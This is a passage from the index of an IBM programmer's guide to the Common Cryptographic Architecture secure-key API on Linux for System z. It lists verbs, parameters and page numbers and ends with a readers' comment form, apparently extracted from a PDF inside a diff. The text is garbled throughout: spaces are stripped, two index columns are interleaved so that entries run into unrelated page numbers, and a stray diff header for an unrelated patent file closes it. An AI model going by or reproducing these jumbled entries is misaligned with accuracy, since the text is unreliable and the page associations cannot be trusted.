PKCSOAEP 199,202,205 +RSApublic 426 PKOAEP2 199,208 +variableModulus-Exponent 435 plaintext +PKAKeyTokenBuild(CSNDPKB) 377 encipher 107 +format 377 enciphering 211 +JNIversion 383 encrypt 107 +parameters 377 plaintextparameter +PKAKeyTokenChange(CSNDKTC) 385 CryptographicVariableEncipherverb 107 +format 385 POSTfirmwareversion 62 +JNIversion 386 power-supplyvoltage 64 +parameters 385 privacy 36 +requiredcommands 386 privateexternalkeytoken +PKAkeytokenidentifier 49 RSA 427 +PKAkeytokensections 48 privateinternalkeytoken +PKAKeyTranslate(CSNDPKT) 388 RSA 430,431,432,436,438,439 +format 388 privatekeytoken +JNIversion 390 RSA 426,427,428 +parameters 388 private_key_nameparameter +requiredcommands 389 PKAKeyTokenBuildverb 381 +restrictions 389 private_key_name_lengthparameter +usagenotes 390 PKAKeyTokenBuildverb 381 +PKAmasterkey 47 problems,reporting xx +PKANMK 67,68,69,70,72 procedurecall 12 +PKAnullkeytoken 51 processingamasterkey 93 +PKAOMK 67,68,69,71,72 processingoverlap 7 +PKAPublicKeyExtract(CSNDPKX) 392 processingrule +format 392 ANSIX9.23 211,215,219 +JNIversion 393 CBC 212,215,219,223,228 +parameters 392 CUSP 212,215,219 +usagenotes 393 Decipher 213,215 +PKAverb 48,52 description 211 +PKA_enciphered_keyvalueparameter ECB 212,223,228 +PKADecryptverb 183 Encipher 217,219 +PKAEncryptverb 186 GBP-PIN 315 +PKA_enciphered_keyvalue_lengthparameter IBM-PIN 315 +PKADecryptverb 182 IBM-PINO 315 +PKAEncryptverb 186 INBK-PIN 315 +PKA_key_identifierparameter IPS 212,215,219 +PKADecryptverb 183 PKCS-PAD 212,223,228 +PKAEncryptverb 186 recommendationsforEncipher 219 +PKA_key_identifier_lengthparameter SymmetricAlgorithmDecipher 221,222 +PKADecryptverb 183 SymmetricAlgorithmEncipher 226,227 +PKAEncryptverb 186 VISA-PVV 315 +PKA_private_key_identifierparameter profile +DigitalSignatureGenerateverb 361 description 7 +PKA_private_key_identifier_lengthparameter ProhibitExport(CSNBPEX) 188 +DigitalSignatureGenerateverb 361 format 188 +PKA_public_key_identifierparameter JNIversion 188 +DigitalSignatureVerifyverb 365 parameters 188 +PKA_public_key_identifier_lengthparameter requiredcommands 188 +DigitalSignatureVerifyverb 365 ProhibitExportExtended(CSNBPEXX) 189 +PKA92 201,205 format 189 +PKA92keyformatandencryptionprocess 511 JNIversion 189 +PKCS#1formats 513 parameters 189 +PKCS1.0 360,361,364,365 requiredcommands 189 +584 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +ProhibitExportExtended(CSNBPEXX) (continued) RemoteKeyExport(CSNDRKX) (continued) +restrictions 189 restrictions 400 +protectedkey 10,11 remotekeyloading +pseudonym 12 ACP 34 +publickeycryptography 47 definition 34 +publickeytoken newexample 35 +RSA 426 oldexample 35 +reservedparameter +ControlVectorGenerateverb 103 +Q +KeyTest2verb 148 +QPENDING 60,66 KeyTokenBuild2verb 161 +questionableDESkey 95 reserved_2parameter +KeyTokenParseverb 171 +PKAKeyTokenBuildverb 382 +R reserved_2_lengthparameter +PKAKeyTokenBuildverb 382 +radiation 64 +reserved_3parameter +RANDOM 191,193 +KeyTokenParseverb 171 +randomnumber 191,193 +PKAKeyTokenBuildverb 382 +RandomNumberGenerate(CSNBRNG) 191 +reserved_3_lengthparameter +format 191 +PKAKeyTokenBuildverb 382 +JNIversion 191 +reserved_4parameter +parameters 191 +KeyTokenParseverb 171 +requiredcommands 191 +PKAKeyTokenBuildverb 382 +RandomNumberGenerateLong(CSNBRNGL) 193 +reserved_4_lengthparameter +format 193 +PKAKeyTokenBuildverb 382 +JNIversion 194 +reserved_5parameter +parameters 193 +KeyTokenParseverb 171 +RandomNumberTests(CSUARNT) 97 +PKAKeyTokenBuildverb 382 +format 97 +reserved_5_lengthparameter +JNIversion 98 +PKAKeyTokenBuildverb 382 +parameters 97 +reserved_6parameter +random_numberparameter +KeyTokenParseverb 171 +KeyTestExtendedverb 152 +reserved_lengthparameter +KeyTestverb 145 +KeyTest2verb 148 +RandomNumberGenerateLongverb 194 +KeyTokenBuild2verb 161 +RandomNumberGenerateverb 191 +resource_nameparameter +random_number_lengthparameter +CryptographicResourceAllocateverb 87 +RandomNumberGenerateLongverb 194 +CryptographicResourceDeallocateverb 89 +reasoncode 407 +resource_name_lengthparameter +reasoncodes +CryptographicResourceAllocateverb 87 +withreturncode0 408 +CryptographicResourceDeallocateverb 89 +withreturncode12 418 +RestrictKeyAttribute(CSNBRKA) 195 +withreturncode16 419 +format 195 +withreturncode4 408 +JNIversion 196 +withreturncode8 409 +parameters 195 +reason_code 15 +requiredcommands 196 +reason_codeparameter 14 +restrictions 196 +recommendationsforEncipherprocessingrule 219 +usagenotes 196 +recordchaining 212 +RETAIN 371 +REFORMAT 102,157,164,170,175,333 +retainedkey 299 +regeneration_dataparameter +RetainedKeyDelete(CSNDRKD) 299 +PKAKeyGenerateverb 371 +format 299 +regeneration_data_lengthparameter +JNIversion 300 +PKAKeyGenerateverb 371 +parameters 299 +relatedpublications xx +relatedinformation 300 +remotekeydistribution 34 +requiredcommands 300 +RemoteKeyExport(CSNDRKX) 394 +RetainedKeyList(CSNDRKL) 301 +format 395 +format 301 +JNIversion 401 +JNIversion 302 +parameters 395 +parameters 301 +requiredcommands 401 +Index 585 + +RetainedKeyList(CSNDRKL) (continued) RSAMEVAR 378 +relatedinformation 302 RTCMK 163,166,265,385,386 +requiredcommands 302 RTNMK 164,167,264,265,266,385,386 +retained_keys_countparameter rule_arrayelement +RetainedKeyListverb 301 lastfivecommands 64 +RETRKPR 137 securityAPIreturncode 64 +returncode 407 rule_arrayparameter 15 +return_code 15 AESKeyRecordCreateverb 267 +return_codeparameter 14 AESKeyRecordDeleteverb 269 +returned_PVVparameter AESKeyRecordListverb 271 +ClearPINGenerateAlternateverb 320 AESKeyRecordReadverb 274 +returned_resultparameter AESKeyRecordWriteverb 276 +ClearPINGenerateverb 316 ClearPINEncryptverb 312 +revisionhistory xv ClearPINGenerateAlternateverb 319 +RIPEMD-160 36 ClearPINGenerateverb 315 +RKXkeytoken 177 ControlVectorGenerateverb 102 +role ControlVectorTranslateverb 105 +DEFAULT 7 CryptographicFacilityQueryverb 59 +description 7 CryptographicResourceAllocateverb 86 +roleidentifier 61,62 CryptographicResourceDeallocateverb 88 +RPMD-160 258,361 CVVGenerateverb 322 +RSA 361,365,374,385 CVVVerifyverb 325 +RSA1024-bitprivateinternalkeytoken 431,432,436, Decipherverb 214 +438,439 DESKeyRecordDeleteverb 280 +RSAalgorithm 47 DigitalSignatureGenerateverb 360 +RSAhardwareversion 62 DigitalSignatureVerifyverb 364 +RSAkey 182,185,201,205,208,360,364,370 DiversifiedKeyGenerateverb 114 +RSAkeygeneration 504 Encipherverb 219 +RSAkeytokensections 51 EncryptedPINGenerateverb 329 +RSAkey-pairgeneration 504 EncryptedPINTranslateverb 333 +RSAprivateexternalChineseRemainderTheoremkey EncryptedPINVerifyverb 339 +token 428 HMACGenerateverb 235 +RSAprivateexternalkeytoken 427 HMACVerifyverb 238 +RSAprivateexternalModulus-Exponentkeytoken 428 KeyGenerate2verb 128 +RSAprivateinternalChineseRemainderTheoremkey KeyPartImportverb 136 +token 433 KeyStorageInitializationverb 90 +RSAprivateinternalkeytoken 431 KeyTestExtendedverb 151 +RSAprivatetoken 426,427,428 KeyTestverb 144 +RSApublictoken 426 KeyTest2verb 147 +RSAvariableModulus-Exponenttoken 435 KeyTokenBuildverb 156 +RSA_enciphered_keyparameter KeyTokenBuild2verb 159 +SymmetricKeyExportverb 199 KeyTokenChangeverb 163 +SymmetricKeyGenerateverb 203 KeyTokenChange2verb 166 +SymmetricKeyImportverb 206,209 KeyTokenParseverb 170 +RSA_enciphered_key_lengthparameter KeyTranslate2verb 175 +SymmetricKeyExportverb 199 MACGenerateverb 242 +SymmetricKeyGenerateverb 203 MACVerifyverb 246 +SymmetricKeyImportverb 206,208 MasterKeyProcessverb 94 +RSA_private_key_identifierparameter MDCGenerateverb 250 +SymmetricKeyImportverb 206,209 MultipleClearKeyImportverb 179 +RSA_private_key_identifier_lengthparameter One-WayHashverb 258 +SymmetricKeyImportverb 206,209 PINChange/Unblockverb 343 +RSA_public_key_identifierparameter PKADecryptverb 182 +SymmetricKeyExportverb 199 PKAEncryptverb 185 +SymmetricKeyGenerateverb 203 PKAKeyGenerateverb 371 +RSA_public_key_identifier_lengthparameter PKAKeyImportverb 374 +SymmetricKeyExportverb 199 PKAKeyRecordCreateverb 288 +SymmetricKeyGenerateverb 202 PKAKeyRecordDeleteverb 290 +RSA-CRT 378,380 PKAKeyRecordListverb 292 +RSA-PRIV 378 PKAKeyRecordReadverb 295 +RSA-PUBL 378 PKAKeyRecordWriteverb 297 +586 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +rule_arrayparameter (continued) rule_array_countparameter (continued) +PKAKeyTokenBuildverb 378 MasterKeyProcessverb 93 +PKAKeyTokenChangeverb 385 MDCGenerateverb 250 +PKAKeyTranslateverb 388 MultipleClearKeyImportverb 179 +PKAPublicKeyExtractverb 392 One-WayHashverb 258 +RandomNumberGenerateLongverb 193 PINChange/Unblockverb 342 +RandomNumberTestsverb 97 PKADecryptverb 182 +RemoteKeyExportverb 396 PKAEncryptverb 185 +RestrictKeyAttributeverb 195 PKAKeyGenerateverb 371 +RetainedKeyDeleteverb 299 PKAKeyImportverb 374 +RetainedKeyListverb 301 PKAKeyRecordCreateverb 288 +SecureMessagingforKeysverb 348 PKAKeyRecordDeleteverb 290 +SecureMessagingforPINsverb 351 PKAKeyRecordListverb 292 +SymmetricAlgorithmDecipherverb 222 PKAKeyRecordReadverb 295 +SymmetricAlgorithmEncipherverb 227 PKAKeyRecordWriteverb 297 +SymmetricKeyExportverb 198 PKAKeyTokenBuildverb 377 +SymmetricKeyGenerateverb 201 PKAKeyTokenChangeverb 385 +SymmetricKeyImportverb 205,208 PKAKeyTranslateverb 388 +TransactionValidationverb 355 PKAPublicKeyExtractverb 392 +TrustedBlockCreateverb 404 RandomNumberGenerateLongverb 193 +rule_array_countparameter 15 RandomNumberTestsverb 97 +AESKeyRecordCreateverb 267 RemoteKeyExportverb 395 +AESKeyRecordDeleteverb 269 RestrictKeyAttributeverb 195 +AESKeyRecordListverb 271 RetainedKeyDeleteverb 299 +AESKeyRecordReadverb 274 RetainedKeyListverb 301 +AESKeyRecordWriteverb 276 SecureMessagingforKeysverb 348 +ClearPINEncryptverb 312 SecureMessagingforPINsverb 351 +ClearPINGenerateAlternateverb 319 SymmetricAlgorithmDecipherverb 222 +ClearPINGenerateverb 315 SymmetricAlgorithmEncipherverb 227 +ControlVectorGenerateverb 102 SymmetricKeyExportverb 198 +ControlVectorTranslateverb 105 SymmetricKeyGenerateverb 201 +CryptographicFacilityQueryverb 59 SymmetricKeyImportverb 205,208 +CryptographicResourceAllocateverb 86 TransactionValidationverb 355 +CryptographicResourceDeallocateverb 88 TrustedBlockCreateverb 404 +CVVGenerateverb 322 rule_idparameter +CVVVerifyverb 325 RemoteKeyExportverb 398 +Decipherverb 214 +DESKeyRecordDeleteverb 280 +S +DigitalSignatureGenerateverb 360 +DigitalSignatureVerifyverb 364 sampleverbcalls 527,532 +DiversifiedKeyGenerateverb 113 SCCOMCRT 389 +Encipherverb 219 SCCOMME 388 +EncryptedPINGenerateverb 329 SCVISA 388 +EncryptedPINTranslateverb 333 SECMSG 102,103,155,170 +EncryptedPINVerifyverb 339 SECMSGkeytype 27 +HMACGenerateverb 235 secmsg_key_identifierparameter +HMACVerifyverb 238 SecureMessagingforKeysverb 349 +KeyGenerate2verb 128 SecureMessagingforPINsverb 352 +KeyPartImportverb 136 secureelectronictransaction(SET)services 65 +KeyStorageInitializationverb 90 securemessaging 38 +KeyTestExtendedverb 151 SecureMessagingforKeys(CSNBSKY) 348 +KeyTestverb 144 format 348 +KeyTest2verb 147 JNIversion 350 +KeyTokenBuildverb 156 parameters 348 +KeyTokenBuild2verb 159 requiredcommands 349 +KeyTokenChangeverb 163 usagenotes 349 +KeyTokenChange2verb 166 SecureMessagingforPINs(CSNBSPN) 351 +KeyTokenParseverb 170 format 351 +KeyTranslate2verb 175 JNIversion 354 +MACGenerateverb 242 parameters 351 +MACVerifyverb 246 requiredcommands 353 +Index 587 + +SecureMessagingforPINs(CSNBSPN) (continued) sizeofbattery-backedRAM 63 +usagenotes 354 sizeofdynamicRAM(DRAM)memory 63 +SecureSocketsLayer(SSL) 36 sizeofflashEPROMmemory 63 +securityAPI 7,12 skeleton_key_identifierparameter +securityAPIprogramming 12 PKAKeyGenerateverb 372 +securityAPIreturncode skeleton_key_identifier_lengthparameter +rule_arrayelement 64 PKAKeyGenerateverb 371 +securityserver 7,9 SMKEY 102,103,114,157,170 +security_server_nameparameter SMPIN 102,103,114,157,170 +AESKeyRecordListverb 272 SNA-SLE 497 +DESKeyRecordListverb 283 source_key_identifierparameter +PKAKeyRecordListverb 293 DataKeyExportverb 109 +seedparameter KeyExportverb 117 +RandomNumberGenerateLongverb 193 KeyImportverb 133 +seed_lengthparameter PKAKeyImportverb 374 +RandomNumberGenerateLongverb 193 PKAKeyTranslateverb 389 +segmenting PKAPublicKeyExtractverb 392 +controlkeywords 242,246 RemoteKeyExportverb 398 +selectingacoprocessorresource 86,88 SymmetricKeyExportverb 199 +SELFENC 352 source_key_identifier_lengthparameter +sequence_numberparameter PKAKeyImportverb 374 +ClearPINEncryptverb 313 PKAKeyTranslateverb 389 +EncryptedPINGenerateverb 330 PKAPublicKeyExtractverb 392 +EncryptedPINTranslateverb 334 RemoteKeyExportverb 398 +sequencesofverbs 39 SymmetricKeyExportverb 199 +serialnumber source_key_tokenparameter +adapter 66,67,68,70,71 ControlVectorTranslateverb 104 +coprocessor 63 DataKeyImportverb 111 +servicerequest 7 ProhibitExportExtendedverb 189 +service_codeparameter source_transport_key_identifierparameter +CVVGenerateverb 323 PKAKeyTranslateverb 389 +CVVVerifyverb 326 source_transport_key_identifier_lengthparameter +SESS-XOR 114,115 PKAKeyTranslateverb 389 +SETcommand 264 SSLsupport 36 +SHA-1 36,143,145,150,160,199,235,238,258, STATAES 59 +361 STATAPKA 59 +SHA-1engine 7 STATCARD 31,59,62 +SHA-224 160,235,238,258 STATCCA 59,61,84 +SHA-256 143,145,147,150,160,199,235,238,258, STATCCAE 59,61 +361 STATDIAG 59,63 +SHA-384 160,199,235,238,258,361 STATEID 59,65 +SHA-512 160,199,235,238,258,361 STATEXPT 59,65 +SHA2VP1 147 STATICSA 60,68,74 +shortblocks 217 STATICSAoperationalkeyparts +SIG-ONLY 378 outputdataformat 74 +signature_bit_lengthparameter STATICSB 70,78 +DigitalSignatureGenerateverb 362 STATICSBoperationalkeyparts +signature_fieldparameter outputdataformat 78 +DigitalSignatureGenerateverb 362 STATICSE 60,71,76 +DigitalSignatureVerifyverb 366 STATICSEoperationalkeyparts +signature_field_lengthparameter outputdataformat 76 +DigitalSignatureGenerateverb 362 STATICSF 60 +DigitalSignatureVerifyverb 366 STATICSX 60,67,81 +SIGSEGVerror 10 STATICSXoperationalkeyparts +SINGLE 102,122,157,170,202 outputdataformat 81 +single-lengthkey STATKPR 60,66,73 +multipledecipherment 506 STATKPRoperationalkeyparts +multipleencipherment 505 outputdataformat 73 +purpose 459,460 STATKPRL 60,66,73 +using 27 STATMOFN 59 +SINGLE-R 122,202 +588 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +sym_encrypted_key_identifierparameter target_key_identifierparameter +RemoteKeyExportverb 399 DataKeyExportverb 109 +sym_encrypted_key_identifier_lengthparameter DataKeyImportverb 111 +RemoteKeyExportverb 399 KeyExportverb 118 +SYM-MK 25,47,93,94,95,145,150 KeyImportverb 134 +SymmetricAlgorithmDecipher(CSNBSAD) 221 PKAKeyImportverb 375 +format 222 SymmetricKeyImportverb 206,209 +JNIversion 225 target_key_identifier_lengthparameter +parameters 222 PKAKeyImportverb 375 +requiredcommands 225 SymmetricKeyImportverb 206,209 +restrictions 225 target_key_tokenparameter +SymmetricAlgorithmDecipherprocessingrule 221 ControlVectorTranslateverb 105 +SymmetricAlgorithmEncipher(CSNBSAE) 226 KeyTokenBuild2verb 161 +format 227 PKAKeyTranslateverb 389 +JNIversion 230 target_key_token_lengthparameter +parameters 227 KeyTokenBuild2verb 161 +requiredcommands 230 PKAKeyTranslateverb 389 +restrictions 230 target_keyvalueparameter +SymmetricAlgorithmEncipherprocessingrule 226 PKADecryptverb 183 +symmetricCMKstatus 61 target_keyvalue_lengthparameter +symmetrickey 34 PKADecryptverb 183 +maximummodulussize 65 target_public_key_tokenparameter +SymmetricKeyEncipher/Decipher-EncryptedAES PKAPublicKeyExtractverb 392 +keys 9 target_public_key_token_lengthparameter +SymmetricKeyEncipher/Decipher-EncryptedDES PKAPublicKeyExtractverb 392 +keys 9 target_transport_key_identifierparameter +SymmetricKeyExport(CSNDSYX) 198 PKAKeyTranslateverb 389 +format 198 target_transport_key_identifier_lengthparameter +JNIversion 200 PKAKeyTranslateverb 389 +parameters 198 TDES 498 +requiredcommands 200 TDESencryption 65 +usagenotes 200 TDES-CBC 348,351 +SymmetricKeyGenerate(CSNDSYG) 201 TDES-DEC 114 +format 201 TDES-ECB 348,351 +JNIversion 204 TDES-ENC 114 +parameters 201 TDES-MAC 242,246 +requiredcommands 203 TDES-XOR 114,343 +usagenotes 204 TDESEMV2 114,343 +SymmetricKeyImport(CSNDSYI) 205 TDESEMV4 114,343 +format 205 temperature 64 +JNIversion 207 terminology xvii +parameters 205 textparameter +requiredcommands 206 HMACGenerateverb 236 +restrictions 206 HMACVerifyverb 239 +usagenotes 207 MACGenerateverb 242 +SymmetricKeyImport2(CSNDSYI2) 208 MACVerifyverb 246 +format 208 MDCGenerateverb 250 +JNIversion 210 One-WayHashverb 259 +parameters 208 text_lengthparameter +requiredcommands 209 CryptographicVariableEncipherverb 107 +restrictions 209 Decipherverb 214 +usagenotes 209 Encipherverb 218 +symmetrickeysmasterkey 25 HMACGenerateverb 236 +symmetricNMKstatus 61 HMACVerifyverb 239 +symmetricOMKstatus 62 MACGenerateverb 241 +sysfsinterface xviii,31,32,538 MACVerifyverb 245 +MDCGenerateverb 250 +One-WayHashverb 259 +T +SecureMessagingforKeysverb 349 +tableofcontents ii SecureMessagingforPINsverb 352 +tampering 64 timeofday 66 +Index 589 + +TIMEDATE 59,65 TrustedBlockCreate(CSNDTBC) (continued) +TKEaccess 66 requiredcommands 405 +TKEworkstation xvii,7,25,47 restrictions 405 +TKESTATE 60,66 trustedblockintegrity 445 +TOKEN 117,118,123,129,133,145,150 trustedblocksections 444 +TOKENkeytype 27 TrustedKeyEntry(TKE) 47,525,553 +tokenparameter overview 38 +PKAKeyRecordCreateverb 288 trusted_block_identifierparameter +PKAKeyRecordReadverb 295 RemoteKeyExportverb 396 +PKAKeyRecordWriteverb 297 TrustedBlockCreateverb 405 +TokenValidationValue(TVV) 422 trusted_block_identifier_lengthparameter +token_dataparameter RemoteKeyExportverb 396 +KeyTokenBuild2verb 161 TrustedBlockCreateverb 405 +token_data_lengthparameter typesofkeys 25 +KeyTokenBuild2verb 161 +token_lengthparameter +U +PKAKeyRecordCreateverb 288 +PKAKeyRecordReadverb 295 UKPT 102,103,157,170 +PKAKeyRecordWriteverb 297 format 310 +TOKEN-DL 269,280,290 UKPTBOTH 334 +TPK-ONLY 365 UKPTIPIN 333,340 +trademarks 562 UKPTOPIN 333 +trailingshortblocks 217 ule_id_lengthparameter +TransactionValidation(CSNBTRV) 355 RemoteKeyExportverb 398 +format 355 USE-CV 156 +JNIversion 357 USECONFG 114,137,164,176,179,202,206 +parameters 355 userID +requiredcommands 356 pendingchange 66 +usagenotes 357 user_associated_dataparameter +transaction_infoparameter KeyTokenBuild2verb 161 +TransactionValidationverb 356 user_associated_data_1parameter +transaction_info_lengthparameter KeyGenerate2verb 130 +TransactionValidationverb 356 user_associated_data_1_lengthparameter +transaction_key_identifierparameter KeyGenerate2verb 130 +TransactionValidationverb 356 user_associated_data_2parameter +transaction_key_identifier_lengthparameter KeyGenerate2verb 130 +TransactionValidationverb 356 user_associated_data_2_lengthparameter +TRANSLAT 102,157,170,333 KeyGenerate2verb 130 +translatedkey 10,11 user_associated_data_lengthparameter +transportkey 20,26,111,394,444 KeyTokenBuild2verb 161 +transportkeyvariant UTCtimeofday 66 +definition 20 utilities +transport_key_identifierparameter ivp.e 31,553 +PKAKeyGenerateverb 372 panel.exe 11,25,31,32,58,266,542,544,546, +RemoteKeyExportverb 397 547,553,554,555,556 +TrustedBlockCreateverb 405 PKAKeyTokenBuild 377 +transport_key_identifier_lengthparameter +RemoteKeyExportverb 397 +triple-DES 498 V +triple-DESencryption 212 +validation_valuesparameter +Triple-DESencryption 65 +TransactionValidationverb 356 +triple-lengthkeys +validation_values_lengthparameter +multipleencipherment 509 +TransactionValidationverb 356 +mutipledecipherment 510 +variableModulus-Exponenttoken +trustedblock 35,403,444 +RSA 435 +numberrepresentation 446 +variabletypes 13 +sectionformat 446 +verb +TrustedBlockCreate(CSNDTBC) 403 +accesscontrol 40,515 +format 404 +AES 40 +JNIversion 405 +AESKeyRecordCreate(CSNBAKRC) 267 +parameters 404 +AESKeyRecordDelete(CSNBAKRD) 269 +590 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +verb (continued) verb (continued) +AESKeyRecordList(CSNBAKRL) 271 KeyTokenBuild(CSNBKTB) 155 +AESKeyRecordRead(CSNBAKRR) 274 KeyTokenBuild2(CSNBKTB2) 159 +AESKeyRecordWrite(CSNBAKRW) 276 KeyTokenChange(CSNBKTC) 163 +CCA 40,55 KeyTokenChange2(CSNBKTC2) 166 +CCAnode 40 KeyTokenParse(CSNBKTP) 169 +CCAnodesandresourcecontrol 57 KeyTranslate(CSNBKTR) 173 +ClearKeyImport(CSNBCKI) 100 KeyTranslate2(CSNBKTR2) 175 +ClearPINEncrypt(CSNBCPE) 312 MACGenerate(CSNBMGN) 241 +ClearPINGenerate(CSNBPGN) 315 MACVerify(CSNBMVR) 245 +ClearPINGenerateAlternate(CSNBCPA) 318 MasterKeyProcess(CSNBMKP) 93 +commonparameters 13,14 MDCGenerate(CSNBMDG) 249 +ControlVectorGenerate(CSNBCVG) 102 MultipleClearKeyImport(CSNBCKM) 179 +ControlVectorTranslate(CSNBCVT) 104 One-WayHash(CSNBOWH) 258 +CryptographicFacilityQuery(CSUACFQ) 58,60 parameterlist 12 +CryptographicFacilityVersion(CSUACFV) 84 parameters 13 +CryptographicResourceAllocate(CSUACRA) 86 PINChange/Unblock(CSNBPCU) 342 +CryptographicResourceDeallocate(CSUACRD) 88 PKA 47,48,52 +CryptographicVariableEncipher(CSNBCVE) 107 PKADecrypt(CSNDPKD) 182 +CVVGenerate(CSNBCSG) 322 PKAEncrypt(CSNDPKE) 185 +CVVVerify(CSNBCSV) 325 PKAKeyGenerate(CSNDPKG) 370 +DataKeyExport(CSNBDKX) 109 PKAKeyImport(CSNDPKI) 374 +DataKeyImport(CSNBDKM) 111 PKAkeymanagement 48 +Decipher(CSNBDEC) 213 PKAKeyRecordCreate(CSNDKRC) 288 +definition 12,19 PKAKeyRecordDelete(CSNDKRD) 290 +DES 40 PKAKeyRecordList(CSNDKRL) 292 +DEScryptographickey 100 PKAKeyRecordRead(CSNDKRR) 295 +DESKeyRecordCreate(CSNBKRC) 278 PKAKeyRecordWrite(CSNDKRW) 297 +DESKeyRecordDelete(CSNBKRD) 280 PKAKeyTokenBuild(CSNDPKB) 377 +DESKeyRecordList(CSNBKRL) 282 PKAKeyTokenChange(CSNDKTC) 385 +DESKeyRecordRead(CSNBKRR) 284 PKAKeyTranslate(CSNDPKT) 388 +DESKeyRecordWrite(CSNBKRW) 286 PKAPublicKeyExtract(CSNDPKX) 392 +description 13 prefix 12 +digitalsignature 48 ProhibitExport(CSNBPEX) 188 +DigitalSignatureGenerate(CSNDDSG) 360 ProhibitExportExtended(CSNBPEXX) 189 +DigitalSignatureVerify(CSNDDSV) 364 RandomNumberGenerate(CSNBRNG) 191 +DiversifiedKeyGenerate(CSNBDKG) 113 RandomNumberGenerateLong(CSNBRNGL) 193 +Encipher(CSNBENC) 217 RandomNumberTests(CSUARNT) 97 +EncryptedPINGenerate(CSNBEPG) 328 relatedinformation 14 +EncryptedPINTranslate(CSNBPTR) 332 RemoteKeyExport(CSNDRKX) 394 +EncryptedPINVerify(CSNBPVR) 338 requiredcommands 14 +entrypointname 12 RestrictKeyAttribute(CSNBRKA) 195 +financialservices 303 restrictions 14 +format 13 RetainedKeyDelete(CSNDRKD) 299 +hashing 40 RetainedKeyList(CSNDRKL) 301 +HMAC 40 SecureMessagingforKeys(CSNBSKY) 348 +HMACGenerate(CSNBHMG) 235 SecureMessagingforPINs(CSNBSPN) 351 +HMACVerify(CSNBHMV) 238 sequence 39 +input/output(I/O)parameter 13 SymmetricAlgorithmDecipher(CSNBSAD) 221 +JNIversion 14 SymmetricAlgorithmEncipher(CSNBSAE) 226 +KeyExport(CSNBKEX) 117 SymmetricKeyExport(CSNDSYX) 198 +KeyGenerate(CSNBKGN) 120 SymmetricKeyGenerate(CSNDSYG) 201 +KeyGenerate2(CSNBKGN2) 128 SymmetricKeyImport(CSNDSYI) 205 +KeyImport(CSNBKIM) 133 SymmetricKeyImport2(CSNDSYI2) 208 +KeyPartImport(CSNBKPI) 136 TransactionValidation(CSNBTRV) 355 +KeyPartImport2(CSNBKPI2) 139 TrustedBlockCreate(CSNDTBC) 403 +keystorage 261 usagenotes 14 +KeyStorageInitialization(CSNBKSI) 90 variabletypes 13 +KeyTest(CSNBKYT) 143 verb_datafield 66,67,68,70,71 +KeyTestExtended(CSNBKYTX) 150 verb_dataparameter +KeyTest2(CSNBKYT2) 147 CryptographicFacilityQueryverb 72 +Index 591 + +verb_dataparameter (continued) Z +forCryptographicFacilityQuery 72 +z/OS +verb_data_lengthparameter +mixedconfigurations 553 +CryptographicFacilityQueryverb 72 +z/VM xviii +verbs +z/VMguest 539 +PIN 304 +z10modelGA3 48 +verificationparttern 74 +z196 47 +verificationpattern 93,143,150,265,491 +zcrypt +verification_patternparameter +installing 537 +KeyTestExtendedverb 152 +ZERO-PAD 182,185,199,202,205,361,365 +KeyTestverb 145 +KeyTest2verb 148 +verification_pattern_lengthparameter +KeyTest2verb 148 +VERIFY 143,145,147,150,160,355,356 +version_dataparameter +CryptographicFacilityVersionverb 84 +version_data_lengthparameter +CryptographicFacilityVersionverb 84 +Visa(EMV)paddingrule 241 +VISAcard-verificationvalue(CVV) 38,303 +VISAPVV 315 +VISAPVVkey 318 +VISA-1 336 +VISA-2PINblockformat 308,479 +VISA-3PINblockformat 308,479 +VISA-4PINblockformat 308 +VISA-PVV 102,157,170,319,339 +VISA-PVValgorithm 319,339 +VISAPCU1 343 +VISAPCU2 343 +VISAPVV4 339 +VISAPVV4algorithm 339 +W +Website xv +whoshouldusethisdocument xvi +WRAP-ECB 102,115,137,156,157,164,170,176, +179,202,206 +WRAP-ENH 102,114,137,156,157,164,170,176, +179,202,206 +WRAPMTHD 59 +wrappingkey 10 +X +X3.106(CBC)method 496 +X9.19OPT 242,246 +X9.31 361,365 +X9.31hashformat 513 +X9.9-1 242,246 +X9.9-1keyword 242,246 +XLATE 102,157,170 +XLATE-OK 378 +XPORT 371 +XPORT-OK 102,157,170 +XPRT-SYM 160 +XPRTAASY 160 +XPRTUASY 160 +592 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Readers’ Comments — We'd Like to Hear from You +LinuxforSystemz +SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide +PublicationNo. SC33-8294-02 +Weappreciateyourcommentsaboutthispublication.Pleasecommentonspecificerrorsoromissions,accuracy, +organization,subjectmatter,orcompletenessofthisbook.Thecommentsyousendshouldpertaintoonlythe +informationinthismanualorproductandthewayinwhichtheinformationispresented. +Fortechnicalquestionsandinformationaboutproductsandprices,pleasecontactyourIBMbranchoffice,yourIBM +businesspartner,oryourauthorizedremarketer. +WhenyousendcommentstoIBM,yougrantIBManonexclusiverighttouseordistributeyourcommentsinany +wayitbelievesappropriatewithoutincurringanyobligationtoyou.IBMoranyotherorganizationswillonlyusethe +personalinformationthatyousupplytocontactyouabouttheissuesthatyoustateonthisform. +Comments: +Thankyouforyoursupport. +Submityourcommentsusingoneofthesechannels: +v Sendyourcommentstotheaddressonthereversesideofthisform. +v Sendyourcommentsviaemailto:eservdoc@de.ibm.com +IfyouwouldlikearesponsefromIBM,pleasefillinthefollowinginformation: +Name Address +CompanyorOrganization +PhoneNo. Emailaddress + +Readers’ Comments — We'd Like to Hear from You (cid:2)(cid:3)(cid:4)(cid:5) CutorFold +AlongLine +SC33-8294-02 +FoldandTape Pleasedonotstaple FoldandTape +_________________________________________________________________________________________ +NOPOSTAGE +NECESSARY +IFMAILEDINTHE +UNITEDSTATES +BUSINESS REPLY MAIL +FIRST-CLASSMAIL PERMITNO.40 ARMONK,NEWYORK +POSTAGEWILLBEPAIDBYADDRESSEE +IBMDeutschlandResearch&DevelopmentGmbH +InformationDevelopment +Department3248 +SchoenaicherStrasse220 +71032Boeblingen +Germany +_________________________________________________________________________________________ +FoldandTape Pleasedonotstaple FoldandTape +CutorFold +SC33-8294-02 AlongLine +___________________________________________________________________________________________________ + +(cid:2)(cid:3)(cid:4)(cid:5) +ProductNumber: +PrintedinUSA +SC33-8294-02 diff --git a/Security Laminate Patent_pdf.md b/Security Laminate 